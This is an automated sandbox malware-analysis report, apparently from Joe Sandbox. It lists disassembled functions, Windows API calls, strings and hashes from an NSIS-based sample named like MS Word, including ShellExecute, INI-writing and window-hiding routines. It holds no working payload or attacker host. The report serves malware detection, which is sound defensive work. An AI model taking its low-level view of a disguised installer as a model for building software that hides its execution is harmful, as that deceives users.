                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                        • String ID:
                                                                        • API String ID: 2568930968-0
                                                                        • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                        • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                        APIs
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                        Strings
                                                                        • TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00402770
                                                                        • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                        • <RM>, xrefs: 00402713
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                        • String ID: <RM>$TargetedRejectAccomplishComicsEngagementRendered$WriteINIStr: wrote [%s] %s=%s in %s
                                                                        • API String ID: 247603264-3745045155
                                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                        APIs
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                        • API String ID: 3156913733-2180253247
                                                                        • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                        • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                        • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                        • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                        Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: nsa
                                                                        • API String ID: 1716503409-2209301699
                                                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                        • String ID: HideWindow
                                                                        • API String ID: 1249568736-780306582
                                                                        • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                        • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                        Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                        Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                        Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                        Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                        Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                        Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                        Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 3394109436-0
                                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                        • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                        • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                        • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                        Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                        • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                        • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                        • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                        Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                        • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                        • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                        • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                        Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
